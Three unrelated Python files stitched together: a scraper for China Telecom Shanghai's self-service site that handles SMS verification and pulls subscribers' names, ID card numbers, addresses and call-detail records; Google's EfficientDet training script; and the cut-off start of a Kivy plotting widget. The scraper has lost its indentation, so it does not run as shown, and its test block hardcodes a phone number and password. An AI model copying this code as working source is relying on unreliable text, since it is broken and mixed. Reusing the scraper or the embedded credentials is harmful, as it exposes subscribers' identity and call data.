"""
        # Set the session cookies
get_detail_url = "http://service.sh.189.cn/service/mobileLogin"
code, key, resp = self.get(get_detail_url)
if code != 0:
return code, key, ''
send_verify_data = {}
send_verify_data['flag'] = 1
send_verify_data['devNo'] = kwargs['tel']
send_verify_data['dateType'] = ''
send_verify_data['startDate'] = ''
send_verify_data['endDate'] = ''
send_verify_data = urllib.urlencode(send_verify_data)
send_sms_url = "http://service.sh.189.cn/service/service/authority/query/billdetail/sendCode.do?" + send_verify_data
code, key, resp = self.get(send_sms_url)
if code != 0:
return code, key, ''
if 'service/error500' in resp.text:
self.log('crawler', 'send_sms_error', resp)
return 9, 'send_sms_error', ''
try:
send_sms_res = json.loads(resp.text)
send_sms_code = send_sms_res['CODE']
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
return 9, "json_error", ""
if send_sms_code == '0':
return 0, "success", ""
else:
self.log('crawler', 'request_error', resp)
return 9, "request_error", ""
def verify(self, **kwargs):
"""
執行二次驗證
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
"""
verify_data = {}
verify_data['input_code'] = kwargs['sms_code']
verify_data['selDevid'] = kwargs['tel']
verify_data['flag'] = 'nocw'
verify_data = urllib.urlencode(verify_data)
check_sms_url = "http://service.sh.189.cn/service/service/authority/query/billdetail/validate.do?" + verify_data
code, key, resp = self.get(check_sms_url)
if code != 0:
return code, key
try:
check_sms_res = json.loads(resp.text)
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
return 9, "json_error"
if check_sms_res['CODE'] == "0":
return 0, "success"
elif check_sms_res['CODE'] == "ME10001":
self.log('network', "website_error", resp)
return 2, "verify_error"
else:
self.log('crawler', "crawl_error", resp)
return 9, "crawl_error"
def crawl_info(self, **kwargs):
"""
爬取帳戶資訊
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
info: dict, 帳戶信息,參考帳戶信息格式
"""
user_info_url = "http://service.sh.189.cn/service/my/basicinfo.do"
code, key, resp = self.post(user_info_url)
if code != 0:
return code, key, {}
try:
user_info_res = json.loads(resp.text)
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
return 9, "json_error", {}
if user_info_res['CODE'] == "0":
try:
info_dict = self.user_info(user_info_res)
except:
error = traceback.format_exc()
self.log('crawler', "html_error : %s" % error, resp)
return 9, 'html_error', {}
return 0, "success", info_dict
        # The official site cannot query personal info, so return empty values for now.
user_info_data = {
'full_name': '',
'id_card': '',
'is_realname_register': False,
'open_date': '',
'address': ''
}
return 0, "success", user_info_data
# elif user_info_res['CODE'] == "ME10001":
# return "website_busy_error", 5, "website problem", {}
# else:
# return "param_error", 9, '返回参数未知:%s'%resp.text, {}
def user_info(self,response):
result = response['RESULT']
full_name = result['CustNAME']
id_card = result['MainIdenNumber']
address = result['PrAddrName']
open_date = ''
if id_card != "":
is_realname_register = True
else:
is_realname_register = False
return {
'full_name': full_name,
'id_card': id_card,
'is_realname_register': is_realname_register,
'open_date': open_date ,
'address' : address
}
def crawl_call_log(self, **kwargs):
"""
爬取詳單
return
status_key: str, 狀態碼金鑰,參考status_code
level: int, 錯誤等級
message: unicode, 詳細的錯誤信息
call_log: list, 通信詳單,參考詳單格式
"""
tail_tel_num = ['2', '4', '6', '8']
if kwargs['tel'][-1] in tail_tel_num:
self.tel = kwargs['tel']
return self.new_crawl_call_log()
missing_list = []
pos_missing = []
crawl_num = 0
call_log = []
today = date.today()
search_month = [x for x in range(0,-6,-1)]
dates_retrys = [(x, self.max_retry) for x in search_month]
log_for_retrys = []
full_time = 50.0
time_fee = 0
rand_sleep = random.randint(30, 55) / 10.0
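        # Retry budget: each month gets self.max_retry quick retries; after those
        # are used up, extra attempts (preceded by a short random sleep) are still
        # queued while the accumulated retry time stays under full_time seconds,
        # otherwise the month is recorded in missing_list.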
while dates_retrys:
each_month, retrys = dates_retrys.pop(0)
retrys -= 1
local_st = time.time()
query_date = today + relativedelta(months=each_month)
search_month = "%d%02d"%(query_date.year, query_date.month)
begDate = "%d-%02d-01"%(query_date.year,query_date.month)
end_day = calendar.monthrange(query_date.year, query_date.month)[1]
endDate = "%d-%02d-%d"%(query_date.year,query_date.month,end_day)
log_for_retrys.append((search_month, retrys, time_fee))
crawl_call_data = {}
crawl_call_data['begin'] = 0
crawl_call_data['end'] = 9999
crawl_call_data['flag'] = 1
crawl_call_data['devNo'] = kwargs['tel']
crawl_call_data['dateType'] = 'now'
crawl_call_data['bill_type'] = 'SCP'
            # Historical bill query:
            # crawl_call_data['queryDate'] = monthDate
            # Real-time bill query:
crawl_call_data['startDate'] = begDate
crawl_call_data['endDate'] = endDate
crawl_call_data = urllib.urlencode(crawl_call_data)
# print crawl_call_data
call_log_url = "http://service.sh.189.cn/service/service/authority/query/billdetailQuery.do?" + crawl_call_data
code, key, resp = self.get(call_log_url)
if code != 0:
if retrys > 0:
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
elif time_fee < full_time:
time.sleep(rand_sleep)
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
else:
self.log("crawler", "重试失败{}".format(search_month), '')
missing_list.append(search_month)
continue
elif "ME10001" in resp.text:
missing_flag = False
                # no call records for this month
                self.log('crawler', 'no call detail records found for this month', resp)
pos_missing.append(search_month)
continue
try:
call_log_res = json.loads(resp.text)
except:
error = traceback.format_exc()
self.log('crawler', "json_error : %s" % error, resp)
missing_list.append(search_month)
continue
if call_log_res['CODE'] == "0":
key, level, message, month_log = self.call_log_get(call_log_res, search_month)
if level != 0:
if retrys > 0:
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
elif time_fee < full_time:
time.sleep(rand_sleep)
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
else:
self.log('crawler', message, resp)
crawl_num += 1
missing_list.append(search_month)
continue
if self.flag:
                    self.log('crawler', u'call-detail fields do not map as expected', resp)
self.flag = False
call_log.extend(month_log)
else:
if retrys > 0:
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
elif time_fee < full_time:
time.sleep(rand_sleep)
local_fee = time.time() - local_st
time_fee += local_fee
dates_retrys.append((each_month, retrys))
else:
self.log('crawler', 'html_error', resp)
missing_list.append(search_month)
crawl_num += 1
continue
self.log("crawler", "重试列表{}".format(log_for_retrys), "")
missing_list.sort(reverse=True)
if crawl_num > 0:
return 9, 'crawl_error', call_log, missing_list, pos_missing
if len(pos_missing) == 6 or len(missing_list) == 6:
return 9, 'website_busy_error', call_log, missing_list, pos_missing
return 0, "success", call_log, missing_list, pos_missing
def get_search_list(self, length=6, strf='%Y%m'):
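        """Return the most recent `length` months as strings (default '%Y%m'), newest first.

        For example, if this were run on 2018-07-15 with the defaults, it would
        return ['201807', '201806', '201805', '201804', '201803', '201802'].
        """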
current_time = datetime.datetime.now()
search_list = []
for month_offset in range(0, length):
search_list.append((current_time - relativedelta(months=month_offset)).strftime(strf))
return search_list
def new_crawl_call_log(self):
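        # Overall flow: two threads drain self.work_queue (first-pass months) and
        # self.crawl_again_queue (retries) through control_work_queue(); results go
        # to self.data_queue, exhausted months end up in self.last_month, and
        # work_control() acts as a time-boxed supervisor that clears self._runing
        # to stop both threads.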
possibly_missing_list = []
        # months with partially missing data
        self.crawl_error = 0
        # crawl work queues
        self.work_queue = Queue()
        self.work_queue_info = Queue()
        # retry queues
        self.crawl_again_queue = Queue()
        self.crawl_again_info_queue = Queue()
        # call-detail data
self.data_queue = Queue()
self._runing = threading.Event()
self._runing.set()
self.last_month = Queue()
searchMonth = [x for x in range(0, -6, -1)]
[self.work_queue.put((x, 0)) for x in searchMonth]
control_work_queue = Thread(target=self.control_work_queue, args=(self.work_queue, 'main', 0.2))
control_work_queue.start()
control_again_queue = Thread(target=self.control_work_queue,
args=(self.crawl_again_queue, "crawl_again", random.uniform(2, 3.5)))
control_again_queue.start()
self.work_control()
control_work_queue.join()
control_again_queue.join()
again_queue_last = []
part_miss_set = set()
miss_set = set()
today = date.today()
while not self.last_month.empty():
work_one = self.last_month.get()
query_date = today + relativedelta(months=work_one[0])
search_month_str = "%d%02d"%(query_date.year, query_date.month)
miss_set.add(search_month_str)
again_queue_last.append({search_month_str: work_one[1]})
while not self.crawl_again_queue.empty():
work_one = self.crawl_again_queue.get()
query_date = today + relativedelta(months=work_one[0])
search_month_str = "%d%02d"%(query_date.year, query_date.month)
miss_set.add(search_month_str)
again_queue_last.append({search_month_str: work_one[1]})
again_list = []
while not self.crawl_again_info_queue.empty():
work_one = self.crawl_again_info_queue.get()
# search_month_str = work_one[0]
query_date = today + relativedelta(months=work_one[0])
search_month_str = "%d%02d"%(query_date.year, query_date.month)
again_list.append({search_month_str: work_one[1]})
self.log("crawler", "重试队列: {}".format(again_list), "")
self.log("crawler", "重试剩余: {}".format(again_queue_last), "")
missing_month_list = [miss_x for miss_x in miss_set]
missing_month_list.sort(reverse=True)
part_missing_list = [x for x in part_miss_set]
part_missing_list.sort(reverse=True)
self.log("crawler", "缺失记录: {} 部分缺失: {}".format(missing_month_list, part_missing_list), "")
data_list = []
while not self.data_queue.empty():
data_list.append(self.data_queue.get())
if len(missing_month_list) == 6:
if self.crawl_error > 0:
return 9, "crawl_error", [], missing_month_list, possibly_missing_list, part_missing_list
else:
return 9, "website_busy_error", [], missing_month_list, possibly_missing_list, part_missing_list
return 0, "success", data_list, missing_month_list, possibly_missing_list, part_missing_list
def control_work_queue(self, work_queue, work_name="main", sleep_time=0):
while self._runing.is_set():
if not work_queue.empty():
get_page_data_params = work_queue.get()
self.get_page_data(*get_page_data_params)
if work_name != 'main':
self.crawl_again_info_queue.put(get_page_data_params)
if work_name != "main":
time.sleep(0)
                # yield control to other threads
time.sleep(sleep_time)
def work_control(self):
must_stop_time = 40
time_limit = 30
empty_time_limit = 20
st_time = time.time()
break_time = st_time + time_limit
empty_break_time = st_time + empty_time_limit
must_break_time = st_time + must_stop_time
while True:
now_time = time.time()
time.sleep(0)
if self.work_queue.empty() and self.crawl_again_queue.empty() and now_time > empty_break_time:
self.log("crawler", "break 1 {} {}".format(st_time, now_time), "")
break
if now_time > break_time and self.work_queue.empty():
self.log("crawler", "break 2 {} {}".format(st_time, now_time), "")
break
if now_time > must_break_time:
self.log("crawler", "break 3 {} {}".format(st_time, now_time), "")
break
time.sleep(0)
self._runing.clear()
def get_page_data(self, each_month, retry_times):
retry_times_limit = 5
retry_times += 1
today = date.today()
query_date = today + relativedelta(months=each_month)
search_month = "%d%02d" % (query_date.year, query_date.month)
begDate = "%d-%02d-01" % (query_date.year, query_date.month)
end_day = calendar.monthrange(query_date.year, query_date.month)[1]
endDate = "%d-%02d-%d" % (query_date.year, query_date.month, end_day)
crawl_call_data = {}
crawl_call_data['begin'] = 0
crawl_call_data['end'] = 9999
crawl_call_data['flag'] = 1
crawl_call_data['devNo'] = self.tel
crawl_call_data['dateType'] = 'now'
crawl_call_data['bill_type'] = 'SCP'
        # Historical bill query:
        # crawl_call_data['queryDate'] = monthDate
        # Real-time bill query:
crawl_call_data['startDate'] = begDate
crawl_call_data['endDate'] = endDate
crawl_call_data = urllib.urlencode(crawl_call_data)
call_log_url = "http://service.sh.189.cn/service/service/authority/query/billdetailQuery.do?" + crawl_call_data
code, key, resp = self.get(call_log_url)
if code == 0:
try:
call_log_res = json.loads(resp.text)
if call_log_res['CODE'] == "0":
key, code02, message, result = self.call_log_get(call_log_res, search_month)
if code02 == 0:
if result:
if self.flag:
                                self.log('crawler', u'call-detail fields do not map as expected', resp)
self.flag = False
[self.data_queue.put(x) for x in result]
return
else:
                            self.log('crawler', u'call detail list is empty', resp)
else:
                        self.log('crawler', u'no data returned', resp)
            except:
                error = traceback.format_exc()
                self.log('crawler', u"failed to parse call details: %s" % error, resp)
self.crawl_error += 1
if retry_times <= retry_times_limit:
self.crawl_again_queue.put((each_month, retry_times))
else:
self.last_month.put((each_month, retry_times))
return
def call_log_get(self, response, search_month):
"""
| `update_time` | string | 更新时间戳 |
| `call_cost` | string | 爬取费用 |
| `call_time` | string | 通话起始时间 |
| `call_method` | string | 呼叫类型(主叫, 被叫) |
| `call_type` | string | 通话类型(本地, 长途) |
| `call_from` | string | 本机通话地 |
| `call_to` | string | 对方归属地 |
| `call_duration` | string | 通话时长 |
"""
records = []
try:
items = response['RESULT']['pagedResult']
call_total = len(items)
for i in range(1,call_total):
item = items[i]
data = {}
data['month'] = search_month
data['update_time'] = item['beginTime']
data['call_cost'] = item['totalFee']
                # The following lines convert the start time to a Unix timestamp
call_time = re.findall('\d{2}', item['beginTime'])
call_time_change = call_time[0] + call_time[1] + '-' + call_time[2] + '-' + call_time[3] + ' ' + \
call_time[4] + ':' + call_time[5] + ':' + call_time[6]
timeArray = time.strptime(call_time_change, "%Y-%m-%d %H:%M:%S")
call_time_timeStamp = str(int(time.mktime(timeArray)))
data['call_time'] = call_time_timeStamp
data['call_method'] = item['callType']
data['call_type'] = item['longDistanceType']
# data['call_from'] = item['callingPartyVisitedCity']
raw_call_from = item['callingPartyVisitedCity'].strip()
call_from, error = self.formatarea(raw_call_from)
if call_from:
data['call_from'] = call_from
else:
# self.log("crawler", "{} {}".format(error, raw_call_from), "")
data['call_from'] = raw_call_from
# data['call_to'] = item['calledPartyVisitedCity']
raw_call_to = item['calledPartyVisitedCity'].strip()
call_to, error = self.formatarea(raw_call_to)
if call_to:
data['call_to'] = call_to
else:
# self.log("crawler", "{} {}".format(error, raw_call_to), "")
if u'国内长途' in raw_call_to and not self.flag:
self.flag = True
data['call_to'] = raw_call_to
data['call_tel'] = item['targetParty']
data['call_duration'] = self.time_format(item['callDuriation'])
records.append(data)
except:
error = traceback.format_exc()
return 'html_error', 9, 'html_error %s' % error, records
return 'success', 0, 'success', records
def time_format(self,time_str):
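        """Convert a duration string such as u'1时2分3秒' (hours/minutes/seconds) to total seconds.

        For example, u'1时2分3秒' -> '3723' (1*3600 + 2*60 + 3) and u'45秒' -> '45';
        the result is returned as a string.
        """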
xx = re.match(u'(.*时)?(.*分)?(.*秒)?', time_str)
h, m, s = 0, 0, 0
if xx.group(1):
hh = re.findall('\d+', xx.group(1))[0]
h = int(hh)
if xx.group(2):
mm = re.findall('\d+', xx.group(2))[0]
m = int(mm)
if xx.group(3):
ss = re.findall('\d+', xx.group(3))[0]
s = int(ss)
real_time = h * 60 * 60 + m * 60 + s
return str(real_time)
# def month_bill(self, **kwargs):
# today = date.today()
# data = {}
# data['billingCycleld'] = "%d%02d"%(today.year,today.month)
# data['queryFlag'] = 0
# data['productld'] = 2
# data['accNbr'] = kwargs['tel']
# data = urllib.urlencode(data)
# month_bill_url = "http://js.189.cn/chargeQuery/chargeQuery_queryCustBill.action?" + data
# try:
# month_bill_req = self.session.post(month_bill_url)
# except:
# error = traceback.format_exc()
# return "request_error", 9, error
# if month_bill_req.status_code == 200:
# return "success", 0, "get info", self.bill_log(month_bill_req.text)
# else:
# return "request_error", 9, "月单爬取失败:%d"%month_bill_req.status_code
#
# def bill_log(self, response):
    #     # Currently returns a list of dicts, keyed (tentatively) by charge and month
# month_bill_res = json.loads(response)
# items = month_bill_res['statisticalList']
# bill_list = []
# for i in range(0,6):
# data = {}
# data['date'] = items[i]['itemName']
# data['bill'] = items[i]['itemCharge']
# bill_list.append(data)
# return bill_list
def crawl_phone_bill(self, **kwargs):
def get_missing_list():
missing_list = []
today = date.today()
search_month = [x for x in range(0, -6, -1)]
for each_month in search_month:
query_date = today + relativedelta(months=each_month)
search_month = "%d%02d" % (query_date.year, query_date.month)
missing_list.append(search_month)
return missing_list
# url = 'http://service.sh.189.cn/service/query/bill'
# code, key, resp = self.get(url)
# if code != 0:
# missing_list = get_missing_list()
# return 0, 'success', [], missing_list
# if u'抱歉,预付费手机暂不支持账单查询,请选择其他设备查看账单' in resp.text:
self.log('website', 'website_busy_error', '')
missing_list = get_missing_list()
return 0, 'success', [], missing_list
if __name__ == '__main__':
c = Crawler()
USER_ID = "17321021422"
USER_PASSWORD = "368372"
c.self_test(tel=USER_ID, pin_pwd=USER_PASSWORD)
|
main.py
|
# Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
    help='GCE zone where the Cloud TPU is located. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=4,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 2, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', None, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
                    'COCO testdev dir. If not None, ignore val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', True,
    'This option helps to rectify a CPU memory leak. If True, every epoch is '
    'run in a separate process for train and eval and memory will be cleared. '
    'Drawback: need to kill 2 processes if training needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
  # The following is for spatial partitioning. `features` has one tensor while
  # `labels` has 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
  # partition is performed on `features` and all partitionable tensors of
  # `labels`; see the partition logic below.
  # In the TPUEstimator context, `shard` and `replica` mean the same thing;
  # following the API, both terms are used here.
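  # For example, with the flag defaults above (--input_partition_dims=[1, 2, 2, 1],
  # --num_cores_per_replica=4), each [batch, height, width, channels] input tensor
  # is split 2x2 along its spatial dimensions, spreading one replica's input over
  # 4 TPU cores.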
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
      raise RuntimeError('--num_cores_per_replica must be a product of array '
                         'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
num_shards=num_shards,
num_examples_per_epoch=FLAGS.num_examples_per_epoch,
strategy=FLAGS.strategy,
backbone_ckpt=FLAGS.backbone_ckpt,
ckpt=FLAGS.ckpt,
val_json_file=FLAGS.val_json_file,
testdev_dir=FLAGS.testdev_dir,
mode=FLAGS.mode)
config_proto = tf.ConfigProto(
allow_soft_placement=True, log_device_placement=False)
if FLAGS.strategy != 'tpu':
if FLAGS.use_xla:
config_proto.graph_options.optimizer_options.global_jit_level = (
tf.OptimizerOptions.ON_1)
config_proto.gpu_options.allow_growth = True
model_dir = FLAGS.model_dir
model_fn_instance = det_model_fn.get_model_fn(FLAGS.model_name)
max_instances_per_image = config.max_instances_per_image
if FLAGS.eval_samples:
eval_steps = int(FLAGS.eval_samples // FLAGS.eval_batch_size)
else:
eval_steps = None
total_examples = int(config.num_epochs * FLAGS.num_examples_per_epoch)
train_steps = total_examples // FLAGS.train_batch_size
logging.info(params)
if not tf.io.gfile.exists(model_dir):
tf.io.gfile.makedirs(model_dir)
config_file = os.path.join(model_dir, 'config.yaml')
if not tf.io.gfile.exists(config_file):
tf.io.gfile.GFile(config_file, 'w').write(str(config))
train_input_fn = dataloader.InputReader(
FLAGS.training_file_pattern,
is_training=True,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
eval_input_fn = dataloader.InputReader(
FLAGS.validation_file_pattern,
is_training=False,
use_fake_data=FLAGS.use_fake_data,
max_instances_per_image=max_instances_per_image)
if FLAGS.strategy == 'tpu':
tpu_config = tf.estimator.tpu.TPUConfig(
FLAGS.iterations_per_loop if FLAGS.strategy == 'tpu' else 1,
num_cores_per_replica=num_cores_per_replica,
input_partition_dims=input_partition_dims,
per_host_input_for_training=tf.estimator.tpu.InputPipelineConfig
.PER_HOST_V2)
run_config = tf.estimator.tpu.RunConfig(
cluster=tpu_cluster_resolver,
model_dir=model_dir,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
tpu_config=tpu_config,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
# TPUEstimator can do both train and eval.
train_est = tf.estimator.tpu.TPUEstimator(
model_fn=model_fn_instance,
train_batch_size=FLAGS.train_batch_size,
eval_batch_size=FLAGS.eval_batch_size,
config=run_config,
params=params)
eval_est = train_est
else:
strategy = None
if FLAGS.strategy == 'gpus':
strategy = tf.distribute.MirroredStrategy()
run_config = tf.estimator.RunConfig(
model_dir=model_dir,
train_distribute=strategy,
log_step_count_steps=FLAGS.iterations_per_loop,
session_config=config_proto,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tf_random_seed=FLAGS.tf_random_seed,
)
def get_estimator(global_batch_size):
params['num_shards'] = getattr(strategy, 'num_replicas_in_sync', 1)
params['batch_size'] = global_batch_size // params['num_shards']
return tf.estimator.Estimator(
model_fn=model_fn_instance, config=run_config, params=params)
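    # For example (illustrative): with the default --train_batch_size=64 and a
    # MirroredStrategy over 8 GPUs, num_shards is 8, so each replica gets a
    # per-replica batch_size of 64 // 8 = 8.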
# train and eval need different estimator due to different batch size.
train_est = get_estimator(FLAGS.train_batch_size)
eval_est = get_estimator(FLAGS.eval_batch_size)
# start train/eval flow.
if FLAGS.mode == 'train':
train_est.train(input_fn=train_input_fn, max_steps=train_steps)
if FLAGS.eval_after_training:
eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
elif FLAGS.mode == 'eval':
# Run evaluation when there's a new checkpoint
for ckpt in tf.train.checkpoints_iterator(
FLAGS.model_dir,
min_interval_secs=FLAGS.min_eval_interval,
timeout=FLAGS.eval_timeout):
logging.info('Starting to evaluate.')
try:
eval_results = eval_est.evaluate(eval_input_fn, steps=eval_steps)
# Terminate eval job when final checkpoint is reached.
try:
current_step = int(os.path.basename(ckpt).split('-')[1])
except IndexError:
logging.info('%s has no global step info: stop!', ckpt)
break
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
if current_step >= train_steps:
logging.info('Eval finished step %d/%d', current_step, train_steps)
break
except tf.errors.NotFoundError:
        # The checkpoint might have been deleted by the time eval finished.
        # We simply skip such cases.
logging.info('Checkpoint %s no longer exists, skipping.', ckpt)
elif FLAGS.mode == 'train_and_eval':
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
try:
step = int(os.path.basename(ckpt).split('-')[1])
current_epoch = (
step * FLAGS.train_batch_size // FLAGS.num_examples_per_epoch)
logging.info('found ckpt at step %d (epoch %d)', step, current_epoch)
except (IndexError, TypeError):
logging.info('Folder %s has no ckpt with valid step.', FLAGS.model_dir)
current_epoch = 0
def run_train_and_eval(e):
print('\n =====> Starting training, epoch: %d.' % e)
train_est.train(
input_fn=train_input_fn,
max_steps=e * FLAGS.num_examples_per_epoch // FLAGS.train_batch_size)
print('\n =====> Starting evaluation, epoch: %d.' % e)
eval_results = eval_est.evaluate(input_fn=eval_input_fn, steps=eval_steps)
ckpt = tf.train.latest_checkpoint(FLAGS.model_dir)
utils.archive_ckpt(eval_results, eval_results['AP'], ckpt)
epochs_per_cycle = 1 # higher number has less graph construction overhead.
for e in range(current_epoch + 1, config.num_epochs + 1, epochs_per_cycle):
if FLAGS.run_epoch_in_child_process:
p = multiprocessing.Process(target=run_train_and_eval, args=(e,))
p.start()
p.join()
if p.exitcode != 0:
return p.exitcode
else:
run_train_and_eval(e)
else:
logging.info('Invalid mode: %s', FLAGS.mode)
if __name__ == '__main__':
app.run(main)
|
cheap_image.py
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mi
import matplotlib.tri as tri
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from kivy.clock import Clock
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.graphics import RenderContext, Color, Rectangle, BindTexture
from kivy.graphics.texture import Texture
from kivy.properties import ListProperty
import copy
from array import array
import hashlib
# import threading
# import time
# Data dictionary: datadict has form {'u':u,'v':v,'V':V,'s1':s1d,'s2':s2d,'t':t,'err':err}
# Station dictionary: statdict has form {<station code>:{'on':<True/False>,'name':<name>,'loc':(x,y,z)}}
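# Note: reconstruct_image() below also reads statdict[<station>]['exists'] and ['diameter']
# when applying an S/N cut, so station entries are expected to carry those keys as well.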
__cheap_image_debug__ = False
class InteractivePlotWidget(Widget):
tex_coords = ListProperty([0, 1, 1, 1, 1, 0, 0, 0])
def __init__(self, **kwargs):
self.canvas = RenderContext()
self.nx = 1024
self.ny = self.nx
# print("On init:",self.nx,self.ny)
with self.canvas:
Color(1, 1, 1)
self.texture = Texture.create(size=(self.nx,self.ny))
